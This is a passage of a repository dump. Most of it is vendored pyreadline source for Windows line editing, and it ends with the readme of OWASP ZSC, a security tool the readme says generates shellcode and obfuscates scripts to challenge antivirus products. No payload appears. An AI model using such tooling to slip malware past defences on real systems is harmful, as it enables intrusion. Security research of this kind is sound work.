15 | text = "" 16 | if cb.ContainsText(): 17 | text = cb.GetText() 18 | 19 | return text 20 | 21 | 22 | def SetClipboardText(text): 23 | cb.SetText(text) 24 | 25 | 26 | if __name__ == '__main__': 27 | txt = GetClipboardText() # display last text clipped 28 | print(txt) 29 | -------------------------------------------------------------------------------- /module/readline_windows/pyreadline/clipboard/no_clipboard.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | #***************************************************************************** 3 | # Copyright (C) 2006 Jorgen Stenarson. 4 | # 5 | # Distributed under the terms of the BSD License. 
The full license is in 6 | # the file COPYING, distributed as part of this software. 7 | #***************************************************************************** 8 | from __future__ import print_function, unicode_literals, absolute_import 9 | 10 | mybuffer = "" 11 | 12 | 13 | def GetClipboardText(): 14 | return mybuffer 15 | 16 | 17 | def SetClipboardText(text): 18 | global mybuffer 19 | mybuffer = text 20 | -------------------------------------------------------------------------------- /module/readline_windows/pyreadline/configuration/startup.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF-8 -*- 2 | # Example snippet to use in a PYTHONSTARTUP file 3 | from __future__ import print_function, unicode_literals, absolute_import 4 | try: 5 | import pyreadline.rlmain 6 | #pyreadline.rlmain.config_path=r"c:\xxx\pyreadlineconfig.ini" 7 | import readline, atexit 8 | import pyreadline.unicode_helper 9 | # 10 | # 11 | #Normally the codepage for pyreadline is set to be sys.stdout.encoding 12 | #if you need to change this uncomment the following line 13 | #pyreadline.unicode_helper.pyreadline_codepage="utf8" 14 | except ImportError: 15 | print("Module readline not available.") 16 | else: 17 | #import tab completion functionality 18 | import rlcompleter 19 | 20 | #Override completer from rlcompleter to disable automatic ( on callable 21 | completer_obj = rlcompleter.Completer() 22 | 23 | def nop(val, word): 24 | return word 25 | 26 | completer_obj._callable_postfix = nop 27 | readline.set_completer(completer_obj.complete) 28 | 29 | #activate tab completion 30 | readline.parse_and_bind("tab: complete") 31 | readline.read_history_file() 32 | atexit.register(readline.write_history_file) 33 | del readline, rlcompleter, atexit 34 | -------------------------------------------------------------------------------- /module/readline_windows/pyreadline/console/__init__.py: 
-------------------------------------------------------------------------------- 1 | from __future__ import print_function, unicode_literals, absolute_import 2 | import glob, sys 3 | 4 | success = False 5 | in_ironpython = "IronPython" in sys.version 6 | 7 | if in_ironpython: 8 | try: 9 | from .ironpython_console import * 10 | success = True 11 | except ImportError: 12 | raise 13 | else: 14 | try: 15 | from .console import * 16 | success = True 17 | except ImportError: 18 | pass 19 | raise 20 | 21 | if not success: 22 | raise ImportError( 23 | "Could not find a console implementation for your platform") 24 | -------------------------------------------------------------------------------- /module/readline_windows/pyreadline/console/console_attributes.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function, unicode_literals, absolute_import 2 | 3 | FOREGROUND_BLUE = 0x0001 4 | FOREGROUND_GREEN = 0x0002 5 | FOREGROUND_RED = 0x0004 6 | FOREGROUND_INTENSITY = 0x0008 7 | BACKGROUND_BLUE = 0x0010 8 | BACKGROUND_GREEN = 0x0020 9 | BACKGROUND_RED = 0x0040 10 | BACKGROUND_INTENSITY = 0x0080 11 | COMMON_LVB_LEADING_BYTE = 0x0100 12 | COMMON_LVB_TRAILING_BYTE = 0x0200 13 | COMMON_LVB_GRID_HORIZONTAL = 0x0400 14 | COMMON_LVB_GRID_LVERTICAL = 0x0800 15 | COMMON_LVB_GRID_RVERTICAL = 0x1000 16 | COMMON_LVB_REVERSE_VIDEO = 0x2000 17 | COMMON_LVB_UNDERSCORE = 0x4000 18 | -------------------------------------------------------------------------------- /module/readline_windows/pyreadline/console/consolebase.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function, unicode_literals, absolute_import 2 | 3 | 4 | class baseconsole(object): 5 | def __init__(self): 6 | pass 7 | 8 | def bell(self): 9 | raise NotImplementedError 10 | 11 | def pos(self, x=None, y=None): 12 | '''Move or query the window cursor.''' 13 | raise NotImplementedError 14 | 15 | 
def size(self): 16 | raise NotImplementedError 17 | 18 | def rectangle(self, rect, attr=None, fill=' '): 19 | '''Fill Rectangle.''' 20 | raise NotImplementedError 21 | 22 | def write_scrolling(self, text, attr=None): 23 | '''write text at current cursor position while watching for scrolling. 24 | 25 | If the window scrolls because you are at the bottom of the screen 26 | buffer, all positions that you are storing will be shifted by the 27 | scroll amount. For example, I remember the cursor position of the 28 | prompt so that I can redraw the line but if the window scrolls, 29 | the remembered position is off. 30 | 31 | This variant of write tries to keep track of the cursor position 32 | so that it will know when the screen buffer is scrolled. It 33 | returns the number of lines that the buffer scrolled. 34 | 35 | ''' 36 | raise NotImplementedError 37 | 38 | def getkeypress(self): 39 | '''Return next key press event from the queue, ignoring others.''' 40 | raise NotImplementedError 41 | 42 | def write(self, text): 43 | raise NotImplementedError 44 | 45 | def page(self, attr=None, fill=' '): 46 | '''Fill the entire screen.''' 47 | raise NotImplementedError 48 | 49 | def isatty(self): 50 | return True 51 | 52 | def flush(self): 53 | pass 54 | -------------------------------------------------------------------------------- /module/readline_windows/pyreadline/console/event.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function, unicode_literals, absolute_import 2 | 3 | 4 | class Event(object): 5 | '''Represent events from the console.''' 6 | 7 | def __init__(self, console, input): 8 | pass 9 | 10 | def __repr__(self): 11 | '''Display an event for debugging.''' 12 | if self.type in ['KeyPress', 'KeyRelease']: 13 | chr = self.char 14 | if ord(chr) < ord("A"): 15 | chr = "?" 
16 | s = "%s char='%s'%d keysym='%s' keycode=%d:%x state=%x keyinfo=%s" % \ 17 | (self.type, chr, ord(self.char), self.keysym, self.keycode, self.keycode, 18 | self.state, self.keyinfo) 19 | elif self.type in ['Motion', 'Button']: 20 | s = '%s x=%d y=%d state=%x' % (self.type, self.x, self.y, 21 | self.state) 22 | elif self.type == 'Configure': 23 | s = '%s w=%d h=%d' % (self.type, self.width, self.height) 24 | elif self.type in ['FocusIn', 'FocusOut']: 25 | s = self.type 26 | elif self.type == 'Menu': 27 | s = '%s state=%x' % (self.type, self.state) 28 | else: 29 | s = 'unknown event type' 30 | return s 31 | 32 | # def __str__(self): 33 | # return "('%s',%s,%s,%s)"%(self.char,self.key,self.state,self.keyinfo) 34 | -------------------------------------------------------------------------------- /module/readline_windows/pyreadline/error.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | #***************************************************************************** 3 | # Copyright (C) 2006 Jorgen Stenarson. 4 | # 5 | # Distributed under the terms of the BSD License. The full license is in 6 | # the file COPYING, distributed as part of this software. 
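#*****************************************************************************
from __future__ import print_function, unicode_literals, absolute_import


class ReadlineError(Exception):
    """Base class of the pyreadline exception hierarchy."""


class GetSetError(ReadlineError):
    """ReadlineError subclass; the places that raise it are not in this file."""
--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/get_doc.py:
--------------------------------------------------------------------------------
from __future__ import print_function, unicode_literals, absolute_import
import sys, textwrap
from .py3k_compat import callable

# Raises KeyError at import time unless a module named "readline" has already
# been imported; that module is expected to expose its Readline object as `rl`.
rlmain = sys.modules["readline"]
rl = rlmain.rl


def get_doc(rl):
    """Return (name, docstring) pairs for the documented callables of *rl*.

    Attributes are visited in dir() order; callables without a docstring
    are left out.
    """
    documented = []
    for attr_name in dir(rl):
        member = getattr(rl, attr_name)
        if callable(member) and member.__doc__:
            documented.append((attr_name, member.__doc__))
    return documented


def get_rest(rl):
    """Return a flat list of lines: name, wrapped docstring, blank, per callable."""
    lines = []
    for funcname, doc in get_doc(rl):
        wrapped = "\n".join(textwrap.wrap(doc, 80, initial_indent=" "))
        lines.extend([funcname, wrapped, ""])
    return lines
--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/keysyms/__init__.py:
--------------------------------------------------------------------------------
from __future__ import print_function, unicode_literals, absolute_import

import sys

success = False
# Kept outside the except clause: Python 3 unbinds the `as` name when the
# clause ends, so the final raise below could not refer to it.
import_error = None
in_ironpython = "IronPython" in sys.version
from . import winconstants

if in_ironpython:
    try:
        from .ironpython_keysyms import *
        success = True
    except ImportError:
        raise
else:
    try:
        from .keysyms import *
        success = True
    except ImportError as x:
        import_error = x

if not success:
    raise ImportError("Could not import keysym for local pythonversion",
                      import_error)
--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/keysyms/winconstants.py:
--------------------------------------------------------------------------------
#This file contains constants that are normally found in win32all
#But included here to avoid the dependency
from __future__ import print_function, unicode_literals, absolute_import

# Virtual-key codes (VK_*).
VK_LBUTTON = 1
VK_RBUTTON = 2
VK_CANCEL = 3
VK_MBUTTON = 4
VK_XBUTTON1 = 5
VK_XBUTTON2 = 6
VK_BACK = 8
VK_TAB = 9
VK_CLEAR = 12
VK_RETURN = 13
VK_SHIFT = 16
VK_CONTROL = 17
VK_MENU = 18
VK_PAUSE = 19
VK_CAPITAL = 20
VK_KANA = 0x15
VK_HANGEUL = 0x15
VK_HANGUL = 0x15
VK_JUNJA = 0x17
VK_FINAL = 0x18
VK_HANJA = 0x19
VK_KANJI = 0x19
VK_ESCAPE = 0x1B
VK_CONVERT = 0x1C
VK_NONCONVERT = 0x1D
VK_ACCEPT = 0x1E
VK_MODECHANGE = 0x1F
VK_SPACE = 32
VK_PRIOR = 33
VK_NEXT = 34
VK_END = 35
VK_HOME = 36
VK_LEFT = 37
VK_UP = 38
VK_RIGHT = 39
VK_DOWN = 40
VK_SELECT = 41
VK_PRINT = 42
VK_EXECUTE = 43
VK_SNAPSHOT = 44
VK_INSERT = 45
VK_DELETE = 46
VK_HELP = 47
VK_LWIN = 0x5B
VK_RWIN = 0x5C
VK_APPS = 0x5D
VK_SLEEP = 0x5F
VK_NUMPAD0 = 0x60
VK_NUMPAD1 = 0x61
VK_NUMPAD2 = 0x62
VK_NUMPAD3 = 0x63
VK_NUMPAD4 = 0x64
VK_NUMPAD5 = 0x65
VK_NUMPAD6 = 0x66
VK_NUMPAD7 = 0x67
VK_NUMPAD8 = 0x68
VK_NUMPAD9 = 0x69
VK_MULTIPLY = 0x6A
VK_ADD = 0x6B
VK_SEPARATOR = 0x6C
VK_SUBTRACT = 0x6D
VK_DECIMAL = 0x6E
VK_DIVIDE = 0x6F
VK_F1 = 0x70
VK_F2 = 0x71
VK_F3 = 0x72
VK_F4 = 0x73
VK_F5 = 0x74
VK_F6 = 0x75
VK_F7 = 0x76
VK_F8 = 0x77
VK_F9 = 0x78
VK_F10 = 0x79
VK_F11 = 0x7A
VK_F12 = 0x7B
VK_F13 = 0x7C
VK_F14 = 0x7D
VK_F15 = 0x7E
VK_F16 = 0x7F
VK_F17 = 0x80
VK_F18 = 0x81
VK_F19 = 0x82
VK_F20 = 0x83
VK_F21 = 0x84
VK_F22 = 0x85
VK_F23 = 0x86
VK_F24 = 0x87
VK_NUMLOCK = 0x90
VK_SCROLL = 0x91
VK_LSHIFT = 0xA0
VK_RSHIFT = 0xA1
VK_LCONTROL = 0xA2
VK_RCONTROL = 0xA3
VK_LMENU = 0xA4
VK_RMENU = 0xA5
VK_BROWSER_BACK = 0xA6
VK_BROWSER_FORWARD = 0xA7
VK_BROWSER_REFRESH = 0xA8
VK_BROWSER_STOP = 0xA9
VK_BROWSER_SEARCH = 0xAA
VK_BROWSER_FAVORITES = 0xAB
VK_BROWSER_HOME = 0xAC
VK_VOLUME_MUTE = 0xAD
VK_VOLUME_DOWN = 0xAE
VK_VOLUME_UP = 0xAF
VK_MEDIA_NEXT_TRACK = 0xB0
VK_MEDIA_PREV_TRACK = 0xB1
VK_MEDIA_STOP = 0xB2
VK_MEDIA_PLAY_PAUSE = 0xB3
VK_LAUNCH_MAIL = 0xB4
VK_LAUNCH_MEDIA_SELECT = 0xB5
VK_LAUNCH_APP1 = 0xB6
VK_LAUNCH_APP2 = 0xB7
VK_OEM_1 = 0xBA
VK_OEM_PLUS = 0xBB
VK_OEM_COMMA = 0xBC
VK_OEM_MINUS = 0xBD
VK_OEM_PERIOD = 0xBE
VK_OEM_2 = 0xBF
VK_OEM_3 = 0xC0
VK_OEM_4 = 0xDB
VK_OEM_5 = 0xDC
VK_OEM_6 = 0xDD
VK_OEM_7 = 0xDE
VK_OEM_8 = 0xDF
VK_OEM_102 = 0xE2
VK_PROCESSKEY = 0xE5
VK_PACKET = 0xE7
VK_ATTN = 0xF6
VK_CRSEL = 0xF7
VK_EXSEL = 0xF8
VK_EREOF = 0xF9
VK_PLAY = 0xFA
VK_ZOOM = 0xFB
VK_NONAME = 0xFC
VK_PA1 = 0xFD
VK_OEM_CLEAR = 0xFE

# Clipboard format identifiers (CF_*).
CF_TEXT = 1
CF_BITMAP = 2
CF_METAFILEPICT = 3
CF_SYLK = 4
CF_DIF = 5
CF_TIFF = 6
CF_OEMTEXT = 7
CF_DIB = 8
CF_PALETTE = 9
CF_PENDATA = 10
CF_RIFF = 11
CF_WAVE = 12
CF_UNICODETEXT = 13
CF_ENHMETAFILE = 14
CF_HDROP = 15
CF_LOCALE = 16
CF_MAX = 17
CF_OWNERDISPLAY = 128
CF_DSPTEXT = 129
CF_DSPBITMAP = 130
CF_DSPMETAFILEPICT = 131
CF_DSPENHMETAFILE = 142
CF_PRIVATEFIRST = 512
CF_PRIVATELAST = 767
CF_GDIOBJFIRST = 768
CF_GDIOBJLAST = 1023

GPTR = 64
GHND = 66
--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/lineeditor/__init__.py:
--------------------------------------------------------------------------------
from __future__ import print_function, unicode_literals, absolute_import
--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/logger.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
#*****************************************************************************
# Copyright (C) 2006 Jorgen Stenarson.
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.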
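#*****************************************************************************
from __future__ import print_function, unicode_literals, absolute_import

import socket, logging, logging.handlers
from pyreadline.unicode_helper import ensure_str

# Destination of the optional socket log.  Messages leave as plain,
# unauthenticated UDP datagrams, so keep the target on the loopback interface.
host = "localhost"
port = logging.handlers.DEFAULT_TCP_LOGGING_PORT

pyreadline_logger = logging.getLogger('PYREADLINE')
pyreadline_logger.setLevel(logging.DEBUG)
pyreadline_logger.propagate = False
formatter = logging.Formatter(str('%(message)s'))
file_handler = None


class NULLHandler(logging.Handler):
    """Handler that discards every record."""

    def emit(self, s):
        pass


class SocketStream(object):
    """Write-only stream that sends each write() as one UDP datagram."""

    def __init__(self, host, port):
        # Remember the destination given by the caller; previously these
        # arguments were ignored and write() read the module globals instead.
        self.host = host
        self.port = port
        self.logsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    def write(self, s):
        """Send *s*, converted by ensure_str, to the configured destination."""
        self.logsocket.sendto(ensure_str(s), (self.host, self.port))

    def flush(self):
        """No-op; datagrams are sent immediately by write()."""
        pass

    def close(self):
        """No-op; the socket is left open."""
        pass


socket_handler = None
pyreadline_logger.addHandler(NULLHandler())


def start_socket_log():
    """Attach a handler that forwards log messages to (host, port) over UDP."""
    global socket_handler
    # Detach a handler left by an earlier call so messages are not duplicated.
    stop_socket_log()
    socket_handler = logging.StreamHandler(SocketStream(host, port))
    socket_handler.setFormatter(formatter)
    pyreadline_logger.addHandler(socket_handler)


def stop_socket_log():
    """Detach the socket handler if one is attached."""
    global socket_handler
    if socket_handler:
        pyreadline_logger.removeHandler(socket_handler)
        socket_handler = None


def start_file_log(filename):
    """Attach a file handler writing to *filename*.

    The file is opened with mode "w", so an existing file at that path is
    truncated.
    """
    global file_handler
    # Close a handler left by an earlier call instead of leaking its file.
    stop_file_log()
    file_handler = logging.FileHandler(filename, "w")
    pyreadline_logger.addHandler(file_handler)


def stop_file_log():
    """Detach and close the file handler if one is attached."""
    global file_handler
    if file_handler:
        pyreadline_logger.removeHandler(file_handler)
        file_handler.close()
        file_handler = None


def stop_logging():
    """Log a final marker, then detach the file and socket handlers."""
    log("STOPING LOG")
    stop_file_log()
    stop_socket_log()


def log(s):
    """Emit *s* at DEBUG level on the PYREADLINE logger."""
    s = ensure_str(s)
    pyreadline_logger.debug(s)
--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/logserver.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
#*****************************************************************************
# Copyright (C) 2006 Jorgen Stenarson.
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#*****************************************************************************
from __future__ import print_function, unicode_literals, absolute_import

import logging
import logging.handlers
import struct, socket
from pyreadline.unicode_helper import ensure_unicode
try:
    import msvcrt
except ImportError:
    msvcrt = None
    print("problem")

port = logging.handlers.DEFAULT_TCP_LOGGING_PORT
host = 'localhost'


def check_key():
    """Return the pending key press as text, or "" when there is none.

    Also returns "" when msvcrt is unavailable, so callers can treat the
    result as a string on every platform (it used to be False, which made
    main() fail on `.lower()`).
    """
    if msvcrt is None:
        return ""
    if msvcrt.kbhit():
        return ensure_unicode(msvcrt.getch())
    return ""


singleline = False


def main():
    """Print datagrams received on `port` until "q" is pressed."""
    # The socket is SOCK_DGRAM, i.e. UDP, even though the port constant is
    # the logging module's default TCP logging port.
    print("Starting UDP logserver on port:", port)
    print("Press q to quit logserver", port)
    print("Press c to clear screen", port)
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # Bind to the loopback name, which is where logger.py sends its
        # messages; binding to "" accepted datagrams on every interface.
        s.bind((host, port))
        s.settimeout(1)
        while 1:
            try:
                # NOTE: datagrams are unauthenticated; whatever arrives is
                # printed as received, so treat the display as untrusted.
                data, addr = s.recvfrom(100000)
                print(data, end="")
            except socket.timeout:
                key = check_key().lower()
                if "q" == key:
                    print("Quitting logserver")
                    break
                elif "c" == key:
                    print("\n" * 100)
    finally:
        s.close()


if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/modes/__init__.py: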
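--------------------------------------------------------------------------------
from __future__ import print_function, unicode_literals, absolute_import
__all__ = ["emacs", "notemacs", "vi"]
from . import emacs, notemacs, vi
# One class per editing mode, in the same order as __all__.
editingmodes = [emacs.EmacsMode, notemacs.NotEmacsMode, vi.ViMode]

#add check to ensure all modes have unique mode names
--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/py3k_compat.py:
--------------------------------------------------------------------------------
from __future__ import print_function, unicode_literals, absolute_import
import sys

if sys.version_info[0] >= 3:
    import collections
    PY3 = True

    # collections.Callable was removed in Python 3.10; the ABC lives in
    # collections.abc.  Fall back to the old location for old interpreters.
    try:
        from collections.abc import Callable as _Callable
    except ImportError:
        _Callable = collections.Callable

    def callable(x):
        """Return True when *x* is an instance of the Callable ABC."""
        return isinstance(x, _Callable)

    def execfile(fname, glob, loc=None):
        """Compile and run the file *fname* in the given namespaces.

        *loc* defaults to *glob*.
        """
        loc = loc if (loc is not None) else glob
        with open(fname) as fil:
            txt = fil.read()
        # NOTE(review): this executes the file's contents with the full
        # privileges of the process; only pass paths whose contents are
        # trusted.
        exec (compile(txt, fname, 'exec'), glob, loc)

    unicode = str
    bytes = bytes
    from io import StringIO
else:
    PY3 = False
    callable = callable
    execfile = execfile
    bytes = str
    unicode = unicode

    from StringIO import StringIO
--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/release.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals, absolute_import
"""Release data for the pyreadline project.

$Id$"""

#*****************************************************************************
# Copyright (C) 2006 Jorgen Stenarson.
#
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.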
13 | #***************************************************************************** 14 | 15 | # Name of the package for release purposes. This is the name which labels 16 | # the tarballs and RPMs made by distutils, so it's best to lowercase it. 17 | name = 'pyreadline' 18 | 19 | # For versions with substrings (like 0.6.16.svn), use an extra . to separate 20 | # the new substring. We have to avoid using either dashes or underscores, 21 | # because bdist_rpm does not accept dashes (an RPM) convention, and 22 | # bdist_deb does not accept underscores (a Debian convention). 23 | 24 | branch = '' 25 | 26 | version = '2.1' 27 | 28 | description = "A python implmementation of GNU readline." 29 | 30 | long_description = \ 31 | """ 32 | The pyreadline package is a python implementation of GNU readline functionality 33 | it is based on the ctypes based UNC readline package by Gary Bishop. 34 | It is not complete. It has been tested for use with windows 2000 and windows xp. 35 | 36 | * pyreadline 2.1 <2015-09-16> 37 | 38 | This is a bugfix release to make pyreadline work with python 3.5. 39 | 40 | Contributors to this release: 41 | 42 | - Jörgen Stenarson, maintainer 43 | - kivhift, improved error message for running on non windows platforms 44 | - zooba, made helpful suggestions to make it work for python 3.5 45 | 46 | Version 2.1 of pyreadline has been verfied for Python 2.7, and 3.4, 3.5. 47 | 48 | 49 | Features: 50 | * keyboard text selection and copy/paste 51 | * Shift-arrowkeys for text selection 52 | * Control-c can be used for copy activate with allow_ctrl_c(True) in config file 53 | * Double tapping ctrl-c will raise a KeyboardInterrupt, use ctrl_c_tap_time_interval(x) 54 | where x is your preferred tap time window, default 0.3 s. 55 | * paste pastes first line of content on clipboard. 56 | * ipython_paste, pastes tab-separated data as list of lists or numpy array if all data is numeric 57 | * paste_mulitline_code pastes multi line code, removing any empty lines. 
58 | 59 | 60 | The latest development version is always available at the IPython github 61 | repository_. 62 | 63 | .. _repository: https://github.com/pyreadline/pyreadline.git 64 | """ 65 | 66 | license = 'BSD' 67 | 68 | authors = {'Jorgen': ('Jorgen Stenarson', 'jorgen.stenarson@kroywen.se'), 69 | 'Gary': ('Gary Bishop', ''), 70 | 'Jack': ('Jack Trainor', ''), } 71 | 72 | url = 'http://ipython.org/pyreadline.html' 73 | download_url = 'https://pypi.python.org/pypi/pyreadline/' 74 | platforms = ['Windows XP/2000/NT', 'Windows 95/98/ME'] 75 | 76 | keywords = ['readline', 'pyreadline'] 77 | 78 | classifiers = ['Development Status :: 5 - Production/Stable', 79 | 'Environment :: Console', 80 | 'Operating System :: Microsoft :: Windows', 81 | 'License :: OSI Approved :: BSD License', 82 | 'Programming Language :: Python :: 2.7', 83 | 'Programming Language :: Python :: 3.2', 84 | 'Programming Language :: Python :: 3.3', 85 | 'Programming Language :: Python :: 3.4', 86 | 'Programming Language :: Python :: 3.5', ] 87 | -------------------------------------------------------------------------------- /module/readline_windows/pyreadline/test/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function, unicode_literals, absolute_import 2 | -------------------------------------------------------------------------------- /module/readline_windows/pyreadline/test/common.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | #***************************************************************************** 3 | # Copyright (C) 2006 Michael Graz. 4 | # 5 | # Distributed under the terms of the BSD License. The full license is in 6 | # the file COPYING, distributed as part of this software. 
#*****************************************************************************
from __future__ import print_function, unicode_literals, absolute_import
from pyreadline.modes.emacs import *
from pyreadline import keysyms
from pyreadline.lineeditor import lineobj
from pyreadline.keysyms.common import make_KeyPress_from_keydescr

import unittest


class MockReadline:
    """Stand-in for the readline object: a line buffer plus a history."""

    def __init__(self):
        self.l_buffer = lineobj.ReadLineTextBuffer("")
        # `history` is not imported by name here; presumably it arrives via
        # the star import from pyreadline.modes.emacs.
        self._history = history.LineHistory()

    def add_history(self, line):
        """Append *line* to the history as a TextLine."""
        entry = lineobj.TextLine(line)
        self._history.add_history(entry)

    def _print_prompt(self):
        """No-op in the mock."""
        pass

    def _bell(self):
        """No-op in the mock."""
        pass

    def insert_text(self, string):
        '''Insert text into the command line.'''
        self.l_buffer.insert_text(string)


class MockConsole:
    """Stand-in console that counts bells and accumulates written text."""

    def __init__(self):
        self.bell_count = 0
        self.text = ''

    def size(self):
        """Return a fixed (1, 1) size."""
        return (1, 1)

    def cursor(self, visible=None, size=None):
        """No-op in the mock."""
        pass

    def bell(self):
        """Count one bell."""
        self.bell_count = self.bell_count + 1

    def write(self, text):
        """Append *text* to the captured output."""
        self.text = self.text + text


class Event:
    """Key event holding one attribute, `char`."""

    def __init__(self, char):
        # Symbolic key names are mapped to their character; any other value
        # is stored unchanged.
        named_keys = (("escape", '\x1b'), ("backspace", '\x08'),
                      ("tab", '\t'), ("space", ' '))
        for key_name, literal in named_keys:
            if char == key_name:
                self.char = literal
                break
        else:
            self.char = char


def keytext_to_keyinfo_and_event(keytext):
    """Return (keyinfo, event) for the key description *keytext*.

    A three-character description of the form "x" (one character in double
    quotes) yields an Event for that character; otherwise the event uses
    element 3 of keyinfo.tuple().
    """
    keyinfo = keysyms.common.make_KeyPress_from_keydescr(keytext)
    is_quoted_char = (len(keytext) == 3 and keytext[0] == '"'
                      and keytext[2] == '"')
    event = Event(keytext[1] if is_quoted_char else keyinfo.tuple()[3])
    return keyinfo, event


#override runTests from from main in unittest to remove sys.exit call
class Tester(unittest.TestProgram):
    """TestProgram variant whose runTests() does not call sys.exit."""

    def runTests(self):
        runner = self.testRunner
        if runner is None:
            runner = unittest.TextTestRunner(verbosity=self.verbosity)
            self.testRunner = runner
        result = runner.run(self.test)
        # sys.exit(not result.wasSuccessful())
--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/unicode_helper.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
#*****************************************************************************
# Copyright (C) 2007 Jorgen Stenarson.
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#*****************************************************************************
import sys

from .py3k_compat import unicode, bytes

# stdout may have no `encoding` attribute: this happens when pdb imports
# readline and doctest has replaced stdout with its collector.  Assume the
# ascii codepage then, and also when the attribute is None.
pyreadline_codepage = getattr(sys.stdout, "encoding", "ascii")
if pyreadline_codepage is None:
    pyreadline_codepage = "ascii"

if sys.version_info < (2, 6):
    bytes = str

PY3 = (sys.version_info >= (3, 0))


def ensure_unicode(text):
    """helper to ensure that text passed to WriteConsoleW is unicode"""
    if not isinstance(text, bytes):
        return text
    try:
        return text.decode(pyreadline_codepage, "replace")
    except (LookupError, TypeError):
        # Unknown or unusable codepage: decode as ascii instead.
        return text.decode("ascii", "replace")


def ensure_str(text):
    """Convert unicode to str using pyreadline_codepage"""
    if not isinstance(text, unicode):
        return text
    try:
        return text.encode(pyreadline_codepage, "replace")
    except (LookupError, TypeError):
        # Unknown or unusable codepage: encode as ascii instead.
        return text.encode("ascii", "replace")


def biter(text):
    """Iterate over *text*; bytes on Python 3 yield one-byte bytes objects."""
    if not (PY3 and isinstance(text, bytes)):
        return iter(text)
    return (octet.to_bytes(1, 'big') for octet in text)
--------------------------------------------------------------------------------
/module/readline_windows/readline.py:
--------------------------------------------------------------------------------
# -*- coding: UTF-8 -*-
#this file is needed in site-packages to emulate readline
#necessary for rlcompleter since it relies on the existance
#of a readline module
from __future__ import print_function, unicode_literals, absolute_import
from pyreadline.rlmain import Readline

__all__ = ['parse_and_bind',
           'get_line_buffer',
           'insert_text',
           'clear_history',
           'read_init_file',
           'read_history_file',
           'write_history_file',
           'get_current_history_length',
           'get_history_length',
           'get_history_item',
           'set_history_length',
           'set_startup_hook',
           'set_pre_input_hook',
           'set_completer',
           'get_completer',
           'get_begidx',
           'get_endidx',
           'set_completer_delims',
           'get_completer_delims',
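           'add_history',
           'callback_handler_install',
           'callback_handler_remove',
           'callback_read_char', ]  #Some other objects are added below

# create a Readline object to contain the state
rl = Readline()

if rl.disable_readline:

    def dummy(*args, **kwargs):
        """Stand-in for every readline function when readline is disabled.

        Accepts any arguments and returns None.  The earlier signature took
        at most one argument, so a call with two positional arguments
        raised TypeError.
        """
        pass

    # Every public name resolves to the same no-op.
    for funk in __all__:
        globals()[funk] = dummy
else:

    def GetOutputFile():
        '''Return the console object used by readline so that it can be used for printing in color.'''
        return rl.console

    __all__.append("GetOutputFile")

    import pyreadline.console as console

    # make these available so this looks like the python readline module
    read_init_file = rl.read_init_file
    parse_and_bind = rl.parse_and_bind
    clear_history = rl.clear_history
    add_history = rl.add_history
    insert_text = rl.insert_text

    write_history_file = rl.write_history_file
    read_history_file = rl.read_history_file

    get_completer_delims = rl.get_completer_delims
    get_current_history_length = rl.get_current_history_length
    get_history_length = rl.get_history_length
    get_history_item = rl.get_history_item
    get_line_buffer = rl.get_line_buffer
    set_completer = rl.set_completer
    get_completer = rl.get_completer
    get_begidx = rl.get_begidx
    get_endidx = rl.get_endidx

    set_completer_delims = rl.set_completer_delims
    set_history_length = rl.set_history_length
    set_pre_input_hook = rl.set_pre_input_hook
    set_startup_hook = rl.set_startup_hook

    callback_handler_install = rl.callback_handler_install
    callback_handler_remove = rl.callback_handler_remove
    callback_read_char = rl.callback_read_char

    # Register rl.readline with the console module.
    console.install_readline(rl.readline)

__all__.append("rl")
--------------------------------------------------------------------------------
/readme.md: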
--------------------------------------------------------------------------------
OWASP ZSC
=========

***THIS SOFTWARE WAS CREATED TO CHALLENGE ANTIVIRUS TECHNOLOGY, RESEARCH NEW ENCRYPTION METHODS, AND PROTECT SENSITIVE OPEN SOURCE FILES WHICH INCLUDE IMPORTANT DATA. CONTRIBUTORS AND OWASP FOUNDATION WILL NOT BE RESPONSIBLE FOR ANY ILLEGAL USAGE.***

OWASP ZSC is open source software written in Python that lets you generate customized shellcode and convert scripts into obfuscated scripts. It runs on Windows, Linux and OSX with Python.

* OWASP Page: https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
* Documents: https://www.gitbook.com/book/ali-razmjoo/owasp-zsc/details
* Home: [https://www.secologist.com/](https://www.secologist.com/)
* Features: http://zsc.z3r0d4y.com/table.html
* Github: https://github.com/Ali-Razmjoo/OWASP-ZSC
* Archive: https://github.com/Ali-Razmjoo/ZCR-Shellcoder-Archive
* Mailing List: https://groups.google.com/d/forum/owasp-zsc
* API: http://api.z3r0d4y.com

[![asciicast](https://asciinema.org/a/90674.png)](https://asciinema.org/a/90674)

#### For more information, read the document files in the main directory or visit the home page.
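--------------------------------------------------------------------------------
/uninstaller.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
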